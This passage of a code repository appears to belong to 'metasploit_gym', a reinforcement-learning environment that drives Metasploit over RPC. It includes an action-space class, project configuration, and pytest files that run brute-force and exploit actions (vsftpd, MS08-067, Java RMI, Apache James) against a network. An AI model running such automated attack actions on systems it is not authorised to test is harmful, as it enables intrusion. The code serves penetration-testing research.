315 | # check to see if all hosts have network access 316 | if self.network.hosts == []: 317 | return False 318 | for host in self.network.hosts: 319 | if host.meterpreter_shell == 0 and host.open_console == 0: 320 | return False 321 | return True 322 | 323 | 324 | class MetasploitSimulatorEnv(MetasploitEnv): 325 | # TODO: Build Simulator Environment as POMDP 326 | def __init__(self): 327 | raise NotImplementedError 328 | 329 | 330 | class FlatActionSpace(spaces.Discrete): 331 | """Flat Action space""" 332 | 333 | def __init__(self, max_subnets, max_hosts_per_subnet): 334 | self.max_subnets = max_subnets 335 | self.max_hosts_per_subnet = max_hosts_per_subnet 336 | self.actions = self.generate_action_list() 337 | super().__init__(len(self.actions)) 338 | 339 | def generate_action_list(self): 340 | action_list = [] 341 | for i in range(self.max_subnets): 342 | for j in range(self.max_hosts_per_subnet): 343 | host_idx = (i, j) 344 | for ScanAction in Scan.__subclasses__(): 345 | scan = ScanAction((i, j)) 346 | action_list.append(scan) 347 | for ExploitAction in Exploit.__subclasses__(): 348 | action = ExploitAction((i, j)) 349 | action_list.append(action) 350 | return action_list 351 | # need to generate each possible action for each possible host 352 | # requires network description 353 | 354 | def get_action(self, action_idx): 355 | """Action has to be an index""" 356 | assert isinstance( 357 | action_idx, int 358 | ), "When using a flat action space must be an integer" 359 | assert action_idx <= len(self.actions) - 1, "Action can't be longer than list" 360 | return self.actions[action_idx] 361 | 362 | def __len__(self): 363 | return len(self.actions) 364 | -------------------------------------------------------------------------------- /pyproject.toml: -------------------------------------------------------------------------------- 1 | # Example configuration for Black. 2 | 3 | # NOTE: you have to use single-quoted strings in TOML for regular expressions. 4 | # It's the equivalent of r-strings in Python. Multiline strings are treated as 5 | # verbose regular expressions by Black. Use [ ] to denote a significant space 6 | # character. 7 | 8 | [tool.black] 9 | line-length = 88 10 | target-version = ['py36', 'py37', 'py38'] 11 | include = '\.pyi?$' 12 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | attrs==21.2.0 2 | certifi==2021.5.30 3 | chardet==4.0.0 4 | cloudpickle==1.6.0 5 | decorator==5.0.9 6 | gym==0.18.3 7 | idna==2.10 8 | iniconfig==1.1.1 9 | msgpack==1.0.2 10 | numpy==1.21.0 11 | packaging==20.9 12 | Pillow==8.2.0 13 | pluggy==0.13.1 14 | py==1.10.0 15 | pyglet==1.5.15 16 | git+git://github.com/DanMcInerney/pymetasploit3.git@498d65f1cd132b62071b78df9dc95fa987abf39e#egg=pymetasploit3 17 | pyparsing==2.4.7 18 | pytest==6.2.4 19 | python-dotenv==0.18.0 20 | requests==2.25.1 21 | retry==0.9.2 22 | scipy==1.7.0 23 | toml==0.10.2 24 | urllib3==1.26.6 25 | -------------------------------------------------------------------------------- /tests/test_agent.py: -------------------------------------------------------------------------------- 1 | import pytest 2 | from metasploit_gym.metasploit_env import MetasploitNetworkEnv 3 | from dotenv import load_dotenv 4 | import os 5 | 6 | load_dotenv() 7 | METASPLOIT_PASS = os.getenv("METASPLOIT_PASSWORD", default=None) 8 | METASPLOIT_PORT = os.getenv("METASPLOIT_PORT", default=None) 9 | METASPLOIT_HOST = os.getenv("METASPLOIT_HOST", default=None) 10 | 11 | 12 | @pytest.fixture() 13 | def network_env(): 14 | network_env = MetasploitNetworkEnv( 15 | msf_host=METASPLOIT_HOST, 16 | msf_rpc_password=METASPLOIT_PASS, 17 | msf_rpc_port=METASPLOIT_PORT, 18 | ) # maybe host config as argument here 19 | yield network_env 20 | network_env.reset() 21 | -------------------------------------------------------------------------------- /tests/test_connection.py: -------------------------------------------------------------------------------- 1 | import pytest 2 | from metasploit_gym.metasploit_env import MetasploitNetworkEnv 3 | from metasploit_gym.action.scan import PortScan 4 | from metasploit_gym.action.exploit import ( 5 | SSH_Bruteforce, 6 | FTP_Bruteforce, 7 | SMB_Bruteforce, 8 | Telnet_Bruteforce, 9 | VSFTPD, 10 | JavaRMIServer, 11 | Ms08_067_Netapi, 12 | ManageEngine_Auth_Upload, 13 | ApacheJamesExecution, 14 | ) 15 | from pymetasploit3.msfrpc import MsfRpcClient 16 | from pymetasploit3.msfrpc import MsfRpcMethod 17 | import os 18 | from dotenv import load_dotenv 19 | 20 | load_dotenv() 21 | METASPLOIT_PASS = os.getenv("METASPLOIT_PASSWORD", default=None) 22 | METASPLOIT_PORT = os.getenv("METASPLOIT_PORT", default=None) 23 | METASPLOIT_HOST = os.getenv("METASPLOIT_HOST", default=None) 24 | 25 | if METASPLOIT_HOST is None or METASPLOIT_PORT is None or METASPLOIT_PASS is None: 26 | raise ValueError( 27 | "Please include a .env file with METASPLOIT_PASS, METASPLOIT_PORT, and METASPLOIT HOST set to the values of the msgrpc service" 28 | ) 29 | 30 | 31 | @pytest.fixture() 32 | def client(): 33 | client = MsfRpcClient( 34 | METASPLOIT_PASS, server=METASPLOIT_HOST, port=METASPLOIT_PORT, ssl=True 35 | ) 36 | yield client 37 | client.call(MsfRpcMethod.AuthLogout) 38 | 39 | 40 | @pytest.fixture() 41 | def network_env(): 42 | network_env = MetasploitNetworkEnv() # maybe host config as argument here 43 | yield network_env 44 | network_env.reset() 45 | 46 | 47 | def test_connection(client): 48 | """ 49 | Test whether we cannot connect to the metasploit server 50 | """ 51 | assert [m for m in dir(client) if not m.startswith("_")] != [] 52 | 53 | 54 | def test_db_connection(client): 55 | """ 56 | Test whether there's a persistent connection to the database 57 | :return: 58 | """ 59 | default_workspace_hosts = client.db.workspaces.list[0] 60 | assert default_workspace_hosts["name"] == "default" 61 | 62 | 63 | def test_network_scan(network_env): 64 | """ 65 | Test scanning in the real network and assume port 22 is open 66 | """ 67 | action = PortScan() 68 | network_env.step(action) 69 | assert 1 == 1 70 | 71 | 72 | def test_ssh_scan(network_env): 73 | """ 74 | Test ssh module execution 75 | """ 76 | action = SSH_Bruteforce() 77 | network_env.step(action) 78 | assert 1 == 1 79 | 80 | 81 | def test_ftp_scan(network_env): 82 | """ 83 | test ftp module execution 84 | """ 85 | action = FTP_Bruteforce() 86 | network_env.step(action) 87 | assert 1 == 1 88 | 89 | 90 | def test_smb_scan(network_env): 91 | action = SMB_Bruteforce() 92 | network_env.step(action) 93 | assert 1 == 1 94 | 95 | 96 | def test_telnet_scan(network_env): 97 | action = Telnet_Bruteforce() 98 | network_env.step(action) 99 | assert 1 == 1 100 | 101 | 102 | def test_vsftpd_exploit(network_env): 103 | action = VSFTPD() 104 | network_env.step(action) 105 | assert 1 == 1 106 | 107 | 108 | def test_java_rmi_server(network_env): 109 | action = JavaRMIServer() 110 | network_env.step(action) 111 | assert 1 == 1 112 | 113 | 114 | def test_ms08_067_netapi(network_env): 115 | action = Ms08_067_Netapi() 116 | network_env.step(action) 117 | assert 1 == 1 118 | 119 | 120 | def test_manageengine_auth_upload(network_env): 121 | action = ManageEngine_Auth_Upload() 122 | network_env.step(action) 123 | assert 1 == 1 124 | 125 | 126 | def test_apache_james_auth_upload(network_env): 127 | action = ApacheJamesExecution() 128 | network_env.step(action) 129 | assert 1 == 1 130 | 131 | 132 | def test_env_update(network_env): 133 | network_env.update_env() 134 | print(network_env.network.vectorize()) 135 | 136 | 137 | def test_env_reset(network_env): 138 | action = ApacheJamesExecution() 139 | network_env.step(action) 140 | network_env.update_env() 141 | network_env.reset() 142 | --------------------------------------------------------------------------------